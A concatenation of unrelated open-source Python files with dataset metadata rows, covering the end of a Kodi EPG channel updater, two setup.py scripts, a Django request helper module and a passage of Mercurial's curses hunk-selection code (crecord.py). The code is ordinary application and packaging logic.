updateChannel(fHandle, "cctveurope", "CCTV-4 (欧洲)")
updateChannel(fHandle, "cctvamerica", "CCTV-4 (美洲)")
updateChannel(fHandle, "cctv5", "CCTV-5 体育")
updateChannel(fHandle, "cctv6", "CCTV-6 电影")
updateChannel(fHandle, "cctv7", "CCTV-7 军事 农业")
updateChannel(fHandle, "cctv8", "CCTV-8 电视剧")
updateChannel(fHandle, "cctvjilu", "CCTV-9 纪录")
updateChannel(fHandle, "cctvdoc", "CCTV-9 纪录(英)")
updateChannel(fHandle, "cctv10", "CCTV-10 科教")
updateChannel(fHandle, "cctv11", "CCTV-11 戏曲")
updateChannel(fHandle, "cctv12", "CCTV-12 社会与法")
updateChannel(fHandle, "cctv13", "CCTV-13 新闻")
updateChannel(fHandle, "cctvchild", "CCTV-14 少儿")
updateChannel(fHandle, "cctv15", "CCTV-15 音乐")
updateChannel(fHandle, "cctv9", "CCTV-NEWS")
updateChannel(fHandle, "cctv5plus", "CCTV体育赛事")
if addon.getSetting("epgWeishi") == "true":
updateChannel(fHandle, "anhui", "安徽卫视")
updateChannel(fHandle, "btv1", "北京卫视")
updateChannel(fHandle, "bingtuan", "兵团卫视")
updateChannel(fHandle, "chongqing", "重庆卫视")
updateChannel(fHandle, "dongfang", "东方卫视")
updateChannel(fHandle, "dongnan", "东南卫视")
updateChannel(fHandle, "gansu", "甘肃卫视")
updateChannel(fHandle, "guangdong", "广东卫视")
updateChannel(fHandle, "guangxi", "广西卫视")
updateChannel(fHandle, "guizhou", "贵州卫视")
updateChannel(fHandle, "hebei", "河北卫视")
updateChannel(fHandle, "henan", "河南卫视")
updateChannel(fHandle, "heilongjiang", "黑龙江卫视")
updateChannel(fHandle, "hubei", "湖北卫视")
updateChannel(fHandle, "jilin", "吉林卫视")
updateChannel(fHandle, "jiangxi", "江西卫视")
updateChannel(fHandle, "kangba", "康巴卫视")
updateChannel(fHandle, "liaoning", "辽宁卫视")
updateChannel(fHandle, "travel", "旅游卫视")
updateChannel(fHandle, "neimenggu", "内蒙古卫视")
updateChannel(fHandle, "ningxia", "宁夏卫视")
updateChannel(fHandle, "qinghai", "青海卫视")
updateChannel(fHandle, "shandong", "山东卫视")
updateChannel(fHandle, "sdetv", "山东教育台")
updateChannel(fHandle, "shenzhen", "深圳卫视")
updateChannel(fHandle, "shan1xi", "山西卫视")
updateChannel(fHandle, "shan3xi", "陕西卫视")
updateChannel(fHandle, "shenzhen", "深圳卫视")
updateChannel(fHandle, "sichuan", "四川卫视")
updateChannel(fHandle, "tianjin", "天津卫视")
updateChannel(fHandle, "xizang", "西藏卫视")
updateChannel(fHandle, "xiamen", "厦门卫视")
updateChannel(fHandle, "xianggangweishi", "香港卫视")
updateChannel(fHandle, "xinjiang", "新疆卫视")
updateChannel(fHandle, "yanbian", "延边卫视")
updateChannel(fHandle, "yunnan", "云南卫视")
updateChannel(fHandle, "zhejiang", "浙江卫视")
fHandle.write('</tv>\n')
fHandle.close()
shutil.copyfile(xbmc.translatePath("special://temp/epg2.xml"), xbmc.translatePath("special://temp/epg.xml")) #Good programming practices, yo!
except Exception:
print(traceback.format_exc())
print("Finished updating EPG")
#Set a timer for the next update
startTimer(30)
def startTimer(delay): #minutes
xbmc.executebuiltin("AlarmClock({0},RunScript({1}),{2},True)".format("EPGUpdate", addon_path + "/epgservice.py", delay))
if __name__ == '__main__':
if addon.getSetting("epg") == "true":
doUpdate()
| gpl-2.0 | -3,637,042,978,797,846,500 | 37.432258 | 143 | 0.679872 | false |
recipy/recipy | setup.py | 1 | 3177 | # Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
setup(
name='recipy',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='0.3.0',
description='A frictionless provenance framework for Python',
long_description="""A frictionless provenance framework for Python.
Please see https://github.com/recipy/recipy for further information.
""",
# The project's main homepage.
url='https://github.com/recipy/recipy',
# Author details
author='Robin Wilson, Raquel Alegre, Janneke van der Zwaan',
author_email='[email protected]',
# Choose your license
license='Apache',
include_package_data=True,
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: Apache Software License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
# What does your project relate to?
keywords='development, science, reproducibility, provenance',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(),
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
#
# Flask needs to be last here, or it screws up the installation in certain
# situations
install_requires=['wrapt', 'tinydb>=3.0.0', 'tinydb-serialization',
'jinja2', 'docopt', 'GitPython', 'colorama',
'Flask-Script', 'flask_bootstrap', 'flask-wtf',
'python-dateutil', 'six', "svn", "binaryornot",
'flask',
# dependencies for `python setup.py build_sphinx`
'sphinx',
'recommonmark',
'sphinx_rtd_theme'],
entry_points={
'console_scripts': [
'recipy=recipyCmd.recipycmd:main',
]
}
)
| apache-2.0 | -1,122,147,261,581,804,700 | 34.696629 | 79 | 0.626062 | false |
sunspec/pysunspec | setup.py | 1 | 1300 | #!/usr/bin/env python
"""
Copyright (c) 2018, SunSpec Alliance
All Rights Reserved
"""
from distutils.core import setup
setup(name = 'pysunspec',
version = '2.1.1',
description = 'Python SunSpec Tools',
author = 'Bob Fox',
author_email = '[email protected]',
classifiers = [
'Operating System :: OS Independent',
'Operating System :: POSIX :: Linux',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
packages = ['sunspec', 'sunspec.core', 'sunspec.core.modbus', 'sunspec.core.test', 'sunspec.core.test.fake'],
package_data = {'sunspec': ['models/smdx/*'], 'sunspec.core.test': ['devices/*']},
scripts = ['scripts/suns.py'],
python_requires='>=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*',
install_requires = ['pyserial'],
)
| mit | -7,677,205,293,987,355,000 | 37.235294 | 115 | 0.546923 | false |
adaptive-learning/proso-apps | proso/django/request.py | 1 | 3326 | from threading import currentThread
import datetime
import json as simplejson
import re
import urllib.parse
def load_query_json(query_dict, key, default_json=None):
value = query_dict.get(key, default_json)
try:
return simplejson.loads(value)
except ValueError:
return simplejson.loads(urllib.parse.unquote(value))
def json_body(body):
try:
return simplejson.loads(body)
except ValueError:
return parse_common_body_to_json(body)
def parse_common_body_to_json(body):
body = body.replace('%5B', '[').replace('%5D', ']')
result = {}
pairs = [x[0] for x in re.findall(r'(.*?[^\\])(\&|$)', body)]
for pair in pairs:
key, value = pair.split('=')
result = _store_body_value(key, value, result)
return result
def _store_body_value(key_string, value, result):
if value.isdigit():
value = int(value)
    keys = [x.strip(']') for x in re.split(r'\[', key_string)]
old = result
for i in range(len(keys)):
k = keys[i]
if k.isdigit():
k = int(k)
if isinstance(old, dict):
new = old.get(k)
elif k <= len(old) - 1:
new = old[k]
else:
new = None
if new is None:
if i == len(keys) - 1:
new = value
else:
if keys[i + 1] == '0':
new = []
else:
new = {}
if isinstance(k, int):
old.append(new)
else:
old[k] = new
else:
if i == len(keys) - 1:
if not isinstance(new, list):
new = [new]
old[k] = new
new.append(value)
old = new
return result
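# Illustrative example (added for clarity, not part of the original module):
# a form-encoded body with bracketed keys is unpacked into nested dicts and
# lists; numeric values become ints and a '0' key segment starts a list, e.g.
#
#     parse_common_body_to_json('limits[0][column]=a&limits[0][value]=1')
#     # -> {'limits': [{'column': 'a', 'value': 1}]}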
def is_user_id_overridden(request):
return 'user' in request.GET and request.user.is_staff
def get_user_id(request=None):
if request is None:
request = get_current_request(force=False)
if request is None:
return None
if is_user_id_overridden(request):
return int(request.GET['user'])
else:
return None if request.user is None else request.user.id
def is_time_overridden(request):
return 'time' in request.GET
def get_time(request):
if 'time' in request.GET:
time = datetime.datetime.strptime(request.GET['time'], '%Y-%m-%d_%H:%M:%S')
return time
else:
return datetime.datetime.now()
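# Illustrative example (added for clarity, not part of the original module):
# a request carrying "?time=2016-01-31_12:30:00" makes get_time() return
# datetime.datetime(2016, 1, 31, 12, 30) instead of the current time.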
def get_language(request):
language = request.GET.get("language", None)
return language if language else request.LANGUAGE_CODE
###############################################################################
# currect request
###############################################################################
_request_initialized = False
_current_request = {}
class RequestMiddleware:
def process_request(self, request):
set_current_request(request)
def set_current_request(request):
global _request_initialized
_request_initialized = True
_current_request[currentThread()] = request
def get_current_request(force=True):
if not force and not _request_initialized:
return None
assert _request_initialized, 'RequestMiddleware is not loaded'
return _current_request[currentThread()]
| mit | -7,258,798,370,872,251,000 | 25.608 | 83 | 0.546001 | false |
facebookexperimental/eden | eden/scm/edenscm/mercurial/crecord.py | 1 | 67542 | # Portions Copyright (c) Facebook, Inc. and its affiliates.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2.
# stuff related specifically to patch manipulation / parsing
#
# Copyright 2008 Mark Edgington <[email protected]>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
#
# This code is based on the Mark Edgington's crecord extension.
# (Itself based on Bryan O'Sullivan's record extension.)
from __future__ import absolute_import
import locale
import os
import re
import signal
from . import encoding, error, patch as patchmod, progress, pycompat, scmutil, util
from .i18n import _
stringio = util.stringio
# This is required for ncurses to display non-ASCII characters in default user
# locale encoding correctly. --immerrr
locale.setlocale(locale.LC_ALL, u"")
# patch comments based on the git one
diffhelptext = _(
"""# To remove '-' lines, make them ' ' lines (context).
# To remove '+' lines, delete them.
# Lines starting with # will be removed from the patch.
"""
)
hunkhelptext = _(
"""#
# If the patch applies cleanly, the edited hunk will immediately be
# added to the record list. If it does not apply cleanly, a rejects file
# will be generated. You can use that when you try again. If all lines
# of the hunk are removed, then the edit is aborted and the hunk is left
# unchanged.
"""
)
patchhelptext = _(
"""#
# If the patch applies cleanly, the edited patch will immediately
# be finalised. If it does not apply cleanly, rejects files will be
# generated. You can use those when you try again.
"""
)
try:
import curses
curses.error
except ImportError:
# I have no idea if wcurses works with crecord...
try:
# pyre-fixme[21]: Could not find `wcurses`.
import wcurses as curses
curses.error
except ImportError:
# wcurses is not shipped on Windows by default, or python is not
# compiled with curses
curses = False
def checkcurses(ui):
"""Return True if the user wants to use curses
This method returns True if curses is found (and that python is built with
it) and that the user has the correct flag for the ui.
"""
return curses and ui.interface("chunkselector") == "curses"
class patchnode(object):
"""abstract class for patch graph nodes
(i.e. patchroot, header, hunk, hunkline)
"""
def firstchild(self):
raise NotImplementedError("method must be implemented by subclass")
def lastchild(self):
raise NotImplementedError("method must be implemented by subclass")
def allchildren(self):
"Return a list of all of the direct children of this node"
raise NotImplementedError("method must be implemented by subclass")
def nextsibling(self):
"""
Return the closest next item of the same type where there are no items
of different types between the current item and this closest item.
If no such item exists, return None.
"""
raise NotImplementedError("method must be implemented by subclass")
def prevsibling(self):
"""
Return the closest previous item of the same type where there are no
items of different types between the current item and this closest item.
If no such item exists, return None.
"""
raise NotImplementedError("method must be implemented by subclass")
def parentitem(self):
raise NotImplementedError("method must be implemented by subclass")
def nextitem(self, skipfolded=True):
"""
Try to return the next item closest to this item, regardless of item's
type (header, hunk, or hunkline).
If skipfolded == True, and the current item is folded, then the child
items that are hidden due to folding will be skipped when determining
the next item.
If it is not possible to get the next item, return None.
"""
try:
itemfolded = self.folded
except AttributeError:
itemfolded = False
if skipfolded and itemfolded:
nextitem = self.nextsibling()
if nextitem is None:
try:
nextitem = self.parentitem().nextsibling()
except AttributeError:
nextitem = None
return nextitem
else:
# try child
item = self.firstchild()
if item is not None:
return item
# else try next sibling
item = self.nextsibling()
if item is not None:
return item
try:
# else try parent's next sibling
item = self.parentitem().nextsibling()
if item is not None:
return item
# else return grandparent's next sibling (or None)
return self.parentitem().parentitem().nextsibling()
except AttributeError: # parent and/or grandparent was None
return None
def previtem(self):
"""
Try to return the previous item closest to this item, regardless of
item's type (header, hunk, or hunkline).
If it is not possible to get the previous item, return None.
"""
# try previous sibling's last child's last child,
# else try previous sibling's last child, else try previous sibling
prevsibling = self.prevsibling()
if prevsibling is not None:
prevsiblinglastchild = prevsibling.lastchild()
if (prevsiblinglastchild is not None) and not prevsibling.folded:
prevsiblinglclc = prevsiblinglastchild.lastchild()
if (prevsiblinglclc is not None) and not prevsiblinglastchild.folded:
return prevsiblinglclc
else:
return prevsiblinglastchild
else:
return prevsibling
# try parent (or None)
return self.parentitem()
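    # Illustrative traversal sketch (added for clarity): given a header H
    # containing hunks K1 (with lines L1, L2) and K2, repeated nextitem()
    # calls starting at H visit H, K1, L1, L2, K2 in that order; if an item
    # is folded, its hidden children are skipped.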
class patch(patchnode, list): # todo: rename patchroot
"""
list of header objects representing the patch.
"""
def __init__(self, headerlist):
self.extend(headerlist)
# add parent patch object reference to each header
for header in self:
header.patch = self
class uiheader(patchnode):
"""patch header
xxx shouldn't we move this to mercurial/patch.py ?
"""
def __init__(self, header):
self.nonuiheader = header
# flag to indicate whether to apply this chunk
self.applied = True
# flag which only affects the status display indicating if a node's
# children are partially applied (i.e. some applied, some not).
self.partial = False
# flag to indicate whether to display as folded/unfolded to user
self.folded = True
# list of all headers in patch
self.patch = None
# flag is False if this header was ever unfolded from initial state
self.neverunfolded = True
self.hunks = [uihunk(h, self) for h in self.hunks]
def prettystr(self):
x = stringio()
self.pretty(x)
return x.getvalue()
def nextsibling(self):
numheadersinpatch = len(self.patch)
indexofthisheader = self.patch.index(self)
if indexofthisheader < numheadersinpatch - 1:
nextheader = self.patch[indexofthisheader + 1]
return nextheader
else:
return None
def prevsibling(self):
indexofthisheader = self.patch.index(self)
if indexofthisheader > 0:
previousheader = self.patch[indexofthisheader - 1]
return previousheader
else:
return None
def parentitem(self):
"""
there is no 'real' parent item of a header that can be selected,
so return None.
"""
return None
def firstchild(self):
"return the first child of this item, if one exists. otherwise None."
if len(self.hunks) > 0:
return self.hunks[0]
else:
return None
def lastchild(self):
"return the last child of this item, if one exists. otherwise None."
if len(self.hunks) > 0:
return self.hunks[-1]
else:
return None
def allchildren(self):
"return a list of all of the direct children of this node"
return self.hunks
def __getattr__(self, name):
return getattr(self.nonuiheader, name)
class uihunkline(patchnode):
"represents a changed line in a hunk"
def __init__(self, linetext, hunk):
self.linetext = linetext
self.applied = True
# the parent hunk to which this line belongs
self.hunk = hunk
        # folding of individual lines is currently not used/needed, but this
        # flag is needed by the previtem method.
self.folded = False
def prettystr(self):
return self.linetext
def nextsibling(self):
numlinesinhunk = len(self.hunk.changedlines)
indexofthisline = self.hunk.changedlines.index(self)
if indexofthisline < numlinesinhunk - 1:
nextline = self.hunk.changedlines[indexofthisline + 1]
return nextline
else:
return None
def prevsibling(self):
indexofthisline = self.hunk.changedlines.index(self)
if indexofthisline > 0:
previousline = self.hunk.changedlines[indexofthisline - 1]
return previousline
else:
return None
def parentitem(self):
"return the parent to the current item"
return self.hunk
def firstchild(self):
"return the first child of this item, if one exists. otherwise None."
# hunk-lines don't have children
return None
def lastchild(self):
"return the last child of this item, if one exists. otherwise None."
# hunk-lines don't have children
return None
class uihunk(patchnode):
"""ui patch hunk, wraps a hunk and keep track of ui behavior"""
maxcontext = 3
def __init__(self, hunk, header):
self._hunk = hunk
self.changedlines = [uihunkline(line, self) for line in hunk.hunk]
self.header = header
# used at end for detecting how many removed lines were un-applied
self.originalremoved = self.removed
# flag to indicate whether to display as folded/unfolded to user
self.folded = True
# flag to indicate whether to apply this chunk
self.applied = True
# flag which only affects the status display indicating if a node's
# children are partially applied (i.e. some applied, some not).
self.partial = False
def nextsibling(self):
numhunksinheader = len(self.header.hunks)
indexofthishunk = self.header.hunks.index(self)
if indexofthishunk < numhunksinheader - 1:
nexthunk = self.header.hunks[indexofthishunk + 1]
return nexthunk
else:
return None
def prevsibling(self):
indexofthishunk = self.header.hunks.index(self)
if indexofthishunk > 0:
previoushunk = self.header.hunks[indexofthishunk - 1]
return previoushunk
else:
return None
def parentitem(self):
"return the parent to the current item"
return self.header
def firstchild(self):
"return the first child of this item, if one exists. otherwise None."
if len(self.changedlines) > 0:
return self.changedlines[0]
else:
return None
def lastchild(self):
"return the last child of this item, if one exists. otherwise None."
if len(self.changedlines) > 0:
return self.changedlines[-1]
else:
return None
def allchildren(self):
"return a list of all of the direct children of this node"
return self.changedlines
def countchanges(self):
"""changedlines -> (n+,n-)"""
add = sum(
1 for l in self.changedlines if l.applied and l.prettystr().startswith(b"+")
)
rem = sum(
1 for l in self.changedlines if l.applied and l.prettystr().startswith(b"-")
)
return add, rem
def getfromtoline(self):
# calculate the number of removed lines converted to context lines
removedconvertedtocontext = self.originalremoved - self.removed
contextlen = len(self.before) + len(self.after) + removedconvertedtocontext
if self.after and self.after[-1] == b"\\ No newline at end of file\n":
contextlen -= 1
fromlen = contextlen + self.removed
tolen = contextlen + self.added
# diffutils manual, section "2.2.2.2 detailed description of unified
# format": "an empty hunk is considered to end at the line that
# precedes the hunk."
#
# so, if either of hunks is empty, decrease its line start. --immerrr
# but only do this if fromline > 0, to avoid having, e.g fromline=-1.
fromline, toline = self.fromline, self.toline
if fromline != 0:
if fromlen == 0:
fromline -= 1
if tolen == 0 and toline > 0:
toline -= 1
fromtoline = b"@@ -%d,%d +%d,%d @@%s\n" % (
fromline,
fromlen,
toline,
tolen,
self.proc and (b" " + self.proc),
)
return fromtoline
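    # Illustrative example (added for clarity): with 3 context lines before,
    # 2 after, 1 applied removal and 2 applied additions starting at source
    # line 10, getfromtoline() yields "@@ -10,6 +10,7 @@": context plus
    # removed lines on the '-' side, context plus added lines on the '+' side.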
def write(self, fp):
# updated self.added/removed, which are used by getfromtoline()
self.added, self.removed = self.countchanges()
fp.write(self.getfromtoline())
hunklinelist = []
# add the following to the list: (1) all applied lines, and
# (2) all unapplied removal lines (convert these to context lines)
for changedline in self.changedlines:
changedlinestr = changedline.prettystr()
if changedline.applied:
hunklinelist.append(changedlinestr)
elif changedlinestr[0:1] == b"-":
hunklinelist.append(b" " + changedlinestr[1:])
fp.write(b"".join(self.before + hunklinelist + self.after))
pretty = write
def prettystr(self):
x = stringio()
self.pretty(x)
return x.getvalue()
def reversehunk(self):
"""return a recordhunk which is the reverse of the hunk
Assuming the displayed patch is diff(A, B) result. The returned hunk is
intended to be applied to B, instead of A.
For example, when A is "0\n1\n2\n6\n" and B is "0\n3\n4\n5\n6\n", and
the user made the following selection:
0
[x] -1 [x]: selected
[ ] -2 [ ]: not selected
[x] +3
[ ] +4
[x] +5
6
This function returns a hunk like:
0
-3
-4
-5
+1
+4
6
Note "4" was first deleted then added. That's because "4" exists in B
side and "-4" must exist between "-3" and "-5" to make the patch
applicable to B.
"""
dels = []
adds = []
for line in self.changedlines:
text = line.linetext
if line.applied:
if text[0:1] == b"+":
dels.append(text[1:])
elif text[0:1] == b"-":
adds.append(text[1:])
elif text[0:1] == b"+":
dels.append(text[1:])
adds.append(text[1:])
hunk = [b"-%s" % l for l in dels] + [b"+%s" % l for l in adds]
h = self._hunk
return patchmod.recordhunk(
h.header, h.toline, h.fromline, h.proc, h.before, hunk, h.after
)
def __getattr__(self, name):
return getattr(self._hunk, name)
def __repr__(self):
return "<hunk %r@%d>" % (self.filename(), self.fromline)
def filterpatch(ui, chunks, chunkselector, operation=None):
"""interactively filter patch chunks into applied-only chunks"""
chunks = list(chunks)
# convert chunks list into structure suitable for displaying/modifying
# with curses. create a list of headers only.
headers = [c for c in chunks if isinstance(c, patchmod.header)]
# if there are no changed files
if len(headers) == 0:
return [], {}
uiheaders = [uiheader(h) for h in headers]
# let user choose headers/hunks/lines, and mark their applied flags
# accordingly
ret = chunkselector(ui, uiheaders, operation=operation)
appliedhunklist = []
for hdr in uiheaders:
if hdr.applied and (
hdr.special() or len([h for h in hdr.hunks if h.applied]) > 0
):
appliedhunklist.append(hdr)
fixoffset = 0
for hnk in hdr.hunks:
if hnk.applied:
appliedhunklist.append(hnk)
# adjust the 'to'-line offset of the hunk to be correct
# after de-activating some of the other hunks for this file
if fixoffset:
# hnk = copy.copy(hnk) # necessary??
hnk.toline += fixoffset
else:
fixoffset += hnk.removed - hnk.added
return (appliedhunklist, ret)
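# Illustrative usage sketch (assumed; the callers live outside this module):
# a command typically parses a diff into chunks and then lets the user trim
# them down, e.g.
#
#     chunks = patchmod.parsepatch(difflines)
#     chunks, opts = filterpatch(ui, chunks, chunkselector, operation="apply")
#
# where the returned chunks contain only the headers and hunks left selected
# in the curses interface.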
def chunkselector(ui, headerlist, operation=None):
"""
curses interface to get selection of chunks, and mark the applied flags
of the chosen chunks.
"""
ui.write(_("starting interactive selection\n"))
chunkselector = curseschunkselector(headerlist, ui, operation)
origsigtstp = sentinel = object()
if util.safehasattr(signal, "SIGTSTP"):
origsigtstp = util.getsignal(signal.SIGTSTP)
try:
with progress.suspend(), util.traced("crecord", cat="blocked"):
curses.wrapper(chunkselector.main)
if chunkselector.initerr is not None:
hint = _(
"re-run with '--config ui.interface=text' to use the text interface"
)
raise error.Abort(chunkselector.initerr, hint=hint)
# ncurses does not restore signal handler for SIGTSTP
finally:
if origsigtstp is not sentinel:
util.signal(signal.SIGTSTP, origsigtstp)
return chunkselector.opts
def testdecorator(testfn, f):
def u(*args, **kwargs):
return f(testfn, *args, **kwargs)
return u
def testchunkselector(testfn, ui, headerlist, operation=None):
"""
test interface to get selection of chunks, and mark the applied flags
of the chosen chunks.
"""
chunkselector = curseschunkselector(headerlist, ui, operation)
if testfn and os.path.exists(testfn):
testf = open(testfn)
testcommands = [x.rstrip("\n") for x in testf.readlines()]
testf.close()
while True:
if chunkselector.handlekeypressed(testcommands.pop(0), test=True):
break
return chunkselector.opts
_headermessages = { # {operation: text}
"apply": _("Select hunks to apply"),
"discard": _("Select hunks to discard"),
None: _("Select hunks to record"),
}
class curseschunkselector(object):
def __init__(self, headerlist, ui, operation=None):
# put the headers into a patch object
self.headerlist = patch(headerlist)
self.ui = ui
self.opts = {}
self.errorstr = None
# list of all chunks
self.chunklist = []
for h in headerlist:
self.chunklist.append(h)
self.chunklist.extend(h.hunks)
# dictionary mapping (fgcolor, bgcolor) pairs to the
# corresponding curses color-pair value.
self.colorpairs = {}
# maps custom nicknames of color-pairs to curses color-pair values
self.colorpairnames = {}
# the currently selected header, hunk, or hunk-line
self.currentselecteditem = self.headerlist[0]
# updated when printing out patch-display -- the 'lines' here are the
# line positions *in the pad*, not on the screen.
self.selecteditemstartline = 0
self.selecteditemendline = None
# define indentation levels
self.headerindentnumchars = 0
self.hunkindentnumchars = 3
self.hunklineindentnumchars = 6
# the first line of the pad to print to the screen
self.firstlineofpadtoprint = 0
# keeps track of the number of lines in the pad
self.numpadlines = None
self.numstatuslines = 1
# keep a running count of the number of lines printed to the pad
# (used for determining when the selected item begins/ends)
self.linesprintedtopadsofar = 0
# the first line of the pad which is visible on the screen
self.firstlineofpadtoprint = 0
# stores optional text for a commit comment provided by the user
self.commenttext = ""
# if the last 'toggle all' command caused all changes to be applied
self.waslasttoggleallapplied = True
# affects some ui text
if operation not in _headermessages:
raise error.ProgrammingError("unexpected operation: %s" % operation)
self.operation = operation
def uparrowevent(self):
"""
try to select the previous item to the current item that has the
most-indented level. for example, if a hunk is selected, try to select
the last hunkline of the hunk prior to the selected hunk. or, if
the first hunkline of a hunk is currently selected, then select the
hunk itself.
"""
currentitem = self.currentselecteditem
nextitem = currentitem.previtem()
if nextitem is None:
# if no parent item (i.e. currentitem is the first header), then
# no change...
nextitem = currentitem
self.currentselecteditem = nextitem
def uparrowshiftevent(self):
"""
select (if possible) the previous item on the same level as the
currently selected item. otherwise, select (if possible) the
parent-item of the currently selected item.
"""
currentitem = self.currentselecteditem
nextitem = currentitem.prevsibling()
# if there's no previous sibling, try choosing the parent
if nextitem is None:
nextitem = currentitem.parentitem()
if nextitem is None:
# if no parent item (i.e. currentitem is the first header), then
# no change...
nextitem = currentitem
self.currentselecteditem = nextitem
def downarrowevent(self):
"""
try to select the next item to the current item that has the
most-indented level. for example, if a hunk is selected, select
the first hunkline of the selected hunk. or, if the last hunkline of
a hunk is currently selected, then select the next hunk, if one exists,
or if not, the next header if one exists.
"""
# self.startprintline += 1 #debug
currentitem = self.currentselecteditem
nextitem = currentitem.nextitem()
# if there's no next item, keep the selection as-is
if nextitem is None:
nextitem = currentitem
self.currentselecteditem = nextitem
def downarrowshiftevent(self):
"""
select (if possible) the next item on the same level as the currently
selected item. otherwise, select (if possible) the next item on the
same level as the parent item of the currently selected item.
"""
currentitem = self.currentselecteditem
nextitem = currentitem.nextsibling()
# if there's no next sibling, try choosing the parent's nextsibling
if nextitem is None:
try:
nextitem = currentitem.parentitem().nextsibling()
except AttributeError:
# parentitem returned None, so nextsibling() can't be called
nextitem = None
if nextitem is None:
# if parent has no next sibling, then no change...
nextitem = currentitem
self.currentselecteditem = nextitem
def rightarrowevent(self):
"""
select (if possible) the first of this item's child-items.
"""
currentitem = self.currentselecteditem
nextitem = currentitem.firstchild()
# turn off folding if we want to show a child-item
if currentitem.folded:
self.togglefolded(currentitem)
if nextitem is None:
# if no next item on parent-level, then no change...
nextitem = currentitem
self.currentselecteditem = nextitem
def leftarrowevent(self):
"""
if the current item can be folded (i.e. it is an unfolded header or
hunk), then fold it. otherwise try select (if possible) the parent
of this item.
"""
currentitem = self.currentselecteditem
# try to fold the item
if not isinstance(currentitem, uihunkline):
if not currentitem.folded:
self.togglefolded(item=currentitem)
return
# if it can't be folded, try to select the parent item
nextitem = currentitem.parentitem()
if nextitem is None:
# if no item on parent-level, then no change...
nextitem = currentitem
if not nextitem.folded:
self.togglefolded(item=nextitem)
self.currentselecteditem = nextitem
def leftarrowshiftevent(self):
"""
select the header of the current item (or fold current item if the
current item is already a header).
"""
currentitem = self.currentselecteditem
if isinstance(currentitem, uiheader):
if not currentitem.folded:
self.togglefolded(item=currentitem)
return
# select the parent item recursively until we're at a header
while True:
nextitem = currentitem.parentitem()
if nextitem is None:
break
else:
currentitem = nextitem
self.currentselecteditem = currentitem
def updatescroll(self):
"scroll the screen to fully show the currently-selected"
selstart = self.selecteditemstartline
selend = self.selecteditemendline
padstart = self.firstlineofpadtoprint
padend = padstart + self.yscreensize - self.numstatuslines - 1
# 'buffered' pad start/end values which scroll with a certain
# top/bottom context margin
padstartbuffered = padstart + 3
padendbuffered = padend - 3
if selend > padendbuffered:
self.scrolllines(selend - padendbuffered)
elif selstart < padstartbuffered:
# negative values scroll in pgup direction
self.scrolllines(selstart - padstartbuffered)
def scrolllines(self, numlines):
"scroll the screen up (down) by numlines when numlines >0 (<0)."
self.firstlineofpadtoprint += numlines
if self.firstlineofpadtoprint < 0:
self.firstlineofpadtoprint = 0
if self.firstlineofpadtoprint > self.numpadlines - 1:
self.firstlineofpadtoprint = self.numpadlines - 1
def toggleapply(self, item=None):
"""
toggle the applied flag of the specified item. if no item is specified,
toggle the flag of the currently selected item.
"""
if item is None:
item = self.currentselecteditem
item.applied = not item.applied
if isinstance(item, uiheader):
item.partial = False
if item.applied:
# apply all its hunks
for hnk in item.hunks:
hnk.applied = True
# apply all their hunklines
for hunkline in hnk.changedlines:
hunkline.applied = True
else:
# un-apply all its hunks
for hnk in item.hunks:
hnk.applied = False
hnk.partial = False
# un-apply all their hunklines
for hunkline in hnk.changedlines:
hunkline.applied = False
elif isinstance(item, uihunk):
item.partial = False
            # apply all its hunklines
for hunkline in item.changedlines:
hunkline.applied = item.applied
siblingappliedstatus = [hnk.applied for hnk in item.header.hunks]
allsiblingsapplied = not (False in siblingappliedstatus)
nosiblingsapplied = not (True in siblingappliedstatus)
siblingspartialstatus = [hnk.partial for hnk in item.header.hunks]
somesiblingspartial = True in siblingspartialstatus
# cases where applied or partial should be removed from header
# if no 'sibling' hunks are applied (including this hunk)
if nosiblingsapplied:
if not item.header.special():
item.header.applied = False
item.header.partial = False
else: # some/all parent siblings are applied
item.header.applied = True
item.header.partial = somesiblingspartial or not allsiblingsapplied
elif isinstance(item, uihunkline):
siblingappliedstatus = [ln.applied for ln in item.hunk.changedlines]
allsiblingsapplied = not (False in siblingappliedstatus)
nosiblingsapplied = not (True in siblingappliedstatus)
# if no 'sibling' lines are applied
if nosiblingsapplied:
item.hunk.applied = False
item.hunk.partial = False
elif allsiblingsapplied:
item.hunk.applied = True
item.hunk.partial = False
else: # some siblings applied
item.hunk.applied = True
item.hunk.partial = True
parentsiblingsapplied = [hnk.applied for hnk in item.hunk.header.hunks]
noparentsiblingsapplied = not (True in parentsiblingsapplied)
allparentsiblingsapplied = not (False in parentsiblingsapplied)
parentsiblingspartial = [hnk.partial for hnk in item.hunk.header.hunks]
someparentsiblingspartial = True in parentsiblingspartial
# if all parent hunks are not applied, un-apply header
if noparentsiblingsapplied:
if not item.hunk.header.special():
item.hunk.header.applied = False
item.hunk.header.partial = False
# set the applied and partial status of the header if needed
else: # some/all parent siblings are applied
item.hunk.header.applied = True
item.hunk.header.partial = (
someparentsiblingspartial or not allparentsiblingsapplied
)
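    # Illustrative example (added for clarity): toggling off a single line of
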